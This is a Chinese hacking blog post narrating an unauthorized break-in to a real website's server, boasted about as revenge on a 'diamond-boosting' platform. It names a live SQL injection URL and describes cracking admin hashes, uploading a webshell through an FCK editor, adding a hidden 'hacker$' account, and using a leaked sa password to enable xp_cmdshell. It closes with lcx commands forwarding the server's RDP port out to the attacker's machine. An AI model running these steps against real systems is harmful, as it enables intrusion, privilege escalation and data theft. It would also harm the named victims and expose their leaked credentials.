前几天俺认识了一个刷钻的我是傻逼，后来在我的威逼利诱下，他放弃了刷钻行业，并且他交出了他所在的平台的帐号密码。登陆后发现里面有钱钱~不过只有18.25元，于是我果断的截图并涂掉了中间的小数点。当我把截图发在九区基友群里，一群我是傻逼就激动了。于是，俺和羽翼决定日掉这个猥琐的平台。
俺们就直接c段了…..

两个人分工，我从前面开搞。反正是c段，找到最简单就行。但是我们无比蛋疼蛋疼无比，几乎每个ip上都是同一类型的站一堆，而且是各种系统各种环境。最开始的时候羽翼发现了一个ecshop 2.7.2，按理说是有洞洞可用的，不过俺是失败了，没办法，俺是菜鸟啊~
经过一段时间查找，俺们盯上了一个IP，上面的站点都是一套叫“医药无忧”的程序，asp+mssql。
发现注入：http:// www.2cto.com /news_detail_all.asp?id=19180作为懒人俺们就直接上工具了，但是某些工具还是不给力，最后出动了safe3的注入检测工具才弄到MD5。

后台 http://www.2cto.com /Admin/Admin_index.asp

后台太tmd郁闷，上传那里自动重命名了，也没别的功能，果断陷入僵局。然后我发现了该网站8080端口也有一个网站，菜刀给力啊~发现登陆页面，用刚才80端口上的网站密码登陆，成功~

当然，也有fck编辑器的目录现身，但是还得找exp去看看，我很懒的，还是去后台登陆了。但是经过折腾，只有公告发布的地方有个上传，但是得选择会员发送，而选择会员那里有点问题，怎么也选不上，于是我又回到了fck….

传马，无压力，拿到webshell。然后我就出去吃饭了，等我回来的时候已经看到用户组里有了hacker$，问之，原来用了某神器成功添加帐户。

但是，3389连上不。羽翼说是防火墙设置了允许3389登陆的IP段，我果断反对啊。因为c段里所有服务器的系统和环境都不一样，应该都是独立服务器，而这台服务器根据一路入侵过来的经验来看，管理员应该是没有什么安全常识的，那么他怎么会想到限制登陆IP段呢。好吧，羽翼被我说服了~~~~服务器上有麦咖啡和360，很多东西都被杀，于是羽翼找人做免杀，但是要等到第二天。然后砍少同学迅速的发现了SQL密码，但是改掉了。然后我们转向了LOL阵地，撸了一把后继续来日。
我提出，www.qzyy.net.cn服务器上的站都是www.yy5u.com开发的，而两个站不在一个ip上，可能另外一台可以3389，但是经过尝试，c段中几乎没有可以3389连接的。说明c段是一个idc管理的，所有3389都被禁用或者改端口什么的。然而我又想不明白的是，这样的话idc就只能卖虚拟空间，但是www.qzyy.net.cn却在8080端口有另一个网站来衔接，这让人很不解啊。不过既然每个IP都无法3389访问，我就不用去再拿一个c段IP来提权了，只能等羽翼的免杀，然后我又不甘心的一个人试着提了好久。
Aspx马儿传上去就被杀，只有砍少那货传了俩编码有问题的马儿没被杀，难道杀软对编码也有要求？恍惚间看见了VNC，一般VNC密码都在注册表，但是我怎么读都没找到password这个键。
 

再一次蛋碎啊。某大牛让我lcx连接或者nc反弹本地，不过时间已经过了十二点了，俺得先休息了。
早上六点多爬起来继续研究，因为该服务器上挂了有十几个网站，其中有一个没有运行的discuz NT，在它的配置文件中找到了sa密码yy5u1357924680。

然而注册表里键值显示3389是开启的且端口未被改动，某大牛说是策略组或者防火墙的功劳。策略组我觉得不大可能，因为这个管理员应该不会那么聪明，而进程里确实看到了firewall。在E盘software文件夹里看到了服务器上安装的一些软件的安装包，确定了vnc版本是4.2.9，并且有一个系统镜像备份，如果把这个镜像下载下来弄虚拟机安装上，在用前段日子出的直接读系统密码的神器，应该就可以获得管理员密码，但是现在对我来说管理员密码并不重要。

后来，放了两天，继续渗透。通过sa用户，用分离器连接，修复xp_cmdshell，成功提权。
然后用lcx转发端口：
本地：
lcx -listen 51 2008
webshell：
设置cmd路径
setp D:\Web\NetSrvWeb\upfiles\image\cmd.exe
转发3389端口
D:\Web\NetSrvWeb\upfiles\image\lcx -slave 本地外网IP 51 127.0.0.1 3389在webshell上执行会出现假死，属于正常情况
成功连接3389。由于自己在网吧，没有时间内网渗透，下次继续

作者：kylin 首发：www.dis9.com